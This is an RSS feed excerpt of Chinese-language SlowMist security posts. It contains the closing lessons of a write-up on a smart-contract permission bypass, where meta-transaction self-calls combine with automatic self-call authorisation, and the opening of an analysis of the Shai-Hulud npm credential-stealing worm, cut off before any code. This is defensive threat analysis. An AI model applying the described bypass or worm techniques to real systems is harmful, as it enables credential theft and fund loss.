normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">这</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">次攻击的核心教训是：当合约同时具备「元交易任意自调用」和「自调用自动授权」两套语义时，二者会构成一个完整的权限绕过链——这不是单点代码漏洞，而是跨组件语义冲突的必然结果。</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 合约开发者在设计元交易或 relay 机制时必须明确划分敏感函数边界，至少在 </span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">executeMetaTransaction</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 中维护一份禁止调用的 selector 列表，并慎用 </span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">src == address(this)</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"> 的无条件自调用授权。慢雾安全团队建议项目方在部署前进行完整的外部安全审计</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">。</span></p></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504936&amp;idx=1&amp;sn=8a8f48e910d76f27242fb43e14c45590&amp;scene=21#wechat_redirect" textvalue="Shai-Hulud 恶意软件深度剖析：开源即失控 ？" data-itemshowtype="0" linktype="text" data-linktype="2">Shai-Hulud 恶意软件深度剖析：开源即失控 ？</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=1&amp;sn=6452ec12fb825b3a0b91ca5be8f009d8&amp;scene=21#wechat_redirect" textvalue="MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线" data-itemshowtype="0" linktype="text" data-linktype="2">MistEye 安全前置闸门正式发布，筑牢 AI Agent 前置检测防线</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=2&amp;sn=476c39eb63c7323cc18604a3ccc5d487&amp;scene=21#wechat_redirect" textvalue="威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析" data-itemshowtype="0" linktype="text" data-linktype="2">威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4&amp;scene=21#wechat_redirect" textvalue="慢雾｜RWA 智能合约安全审计服务正式推出" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾｜RWA 智能合约安全审计服务正式推出</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504881&amp;idx=1&amp;sn=8c83bc9f82e684fdb75e04fade95913f&amp;scene=21#wechat_redirect" textvalue="Grok 被利用背后：AI Agent 权限链滥用分析" data-itemshowtype="0" linktype="text" data-linktype="2">Grok 被利用背后：AI Agent 权限链滥用分析</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=bcd56185&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504946%26idx%3D1%26sn%3D7904df2118a2c618557db8bdd810f2b6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 14 May 2026 21:18:00 +0800</pubDate>
    </item>
    <item>
      <title>Shai-Hulud 恶意软件深度剖析：开源即失控 ？</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504936&amp;idx=1&amp;sn=8a8f48e910d76f27242fb43e14c45590</link>
      <description>本文围绕 Shai-Hulud 恶意软件开源事件，分析其供应链攻击链路、凭证窃取能力，以及对开源生态与 AI 开发环境带来的安全威胁。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-05-13 15:52</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=cec8e2fb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLsAH2gnSMTmGK8wMibiaibYicRicJvh8f73UQHW9jv1yjxYloTs1BmbxpgvegyOicKlyELzmb1ohsKAAMj4JDAJGmoGaopcQkaho3as%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本文围绕 Shai-Hulud 恶意软件开源事件，分析其供应链攻击链路、凭证窃取能力，以及对开源生态与 AI 开发环境带来的安全威胁。</p>
  <p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Shai-Hulud 是一种针对开源软件供应链的重大网络安全威胁，是一种具有自我传播能力的 npm 恶意蠕虫病毒，会感染开源生态系统。它被认为是 npm 近年来最大规模的供应链攻击之一，涉及数百个恶意包，SlowMist MistEye 威胁情报系统已多次预警。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.075" data-type="png" data-w="1080" height="647" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021277" src="https://wechat2rss.xlab.app/img-proxy/?k=25f7bf7c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIfwB36Cxrvq9iaqANiaUpmMAGA9nBMDajjteibkygkibcicJb4qJibOPv7wMkAQSUKnibQcQaynzp8MNWBMY1P3PicLgQ5ZUEMx9D2XIE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">昨日，一个名为 TeamPCP 的威胁组织做出了令安全界震惊的举动：他们将自己开发的凭证窃取恶意软件 Shai-Hulud 的完整源代码发布到了 GitHub 上。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这不是一次误操作，而是一场精心策划的&#34;能力扩散&#34;行动。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4583333333333333" data-type="png" data-w="1080" height="276" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021278" src="https://wechat2rss.xlab.app/img-proxy/?k=ef1e35f2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCK5G46d6Onslia9lDqoN46ib2monvQnH6xvPF9lycwoBfRicTVWNiafibEmlcFr372fbYHNLjoxFTWgww4m8TyCL3nE2zSxkebXHU9Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">一、事件背景</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1.1 什么是 Shai-Hulud？</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Shai-Hulud 是一款专门针对 GitHub Actions CI/CD 环境的凭证窃取工具。其名字来源于科幻小说《沙丘》中的巨型沙虫，暗示其强大的&#34;吞噬&#34;能力，吞噬一切它能接触到的敏感凭证。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1.2 发生了什么？</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TeamPCP 做了三件事：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">开源代码：将完整源码发布到 GitHub</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">使用被入侵账号：通过被黑的 GitHub 账号传播</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">提供部署手册：附带完整使用说明</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">目前已有多个活跃仓库，且数量还在增长。攻击者甚至在仓库标题中直接写道：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">A Gift From TeamPCP（TeamPCP 的礼物）</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">极具嘲讽意味。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">二、技术架构深度解析</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.1 四层攻击架构</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Shai-Hulud 攻击架构</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6259259259259259" data-type="png" data-w="1080" height="376" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021276" src="https://wechat2rss.xlab.app/img-proxy/?k=81f5f205&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCKM2xLkym5rJHHiaibIkDFjNZtqcLicHZmCbGjmdByeT5mVr6m34UD0DpucOpa3T63wxVLO8sSyVvh18UEnvibPQCnAiaWUGavC9APM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">具体代码实现：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. 启动入口与主外传目标</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/package.json:11`，`Shai-Hulud-Open-Source-main/src/index.ts:96-98`</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, 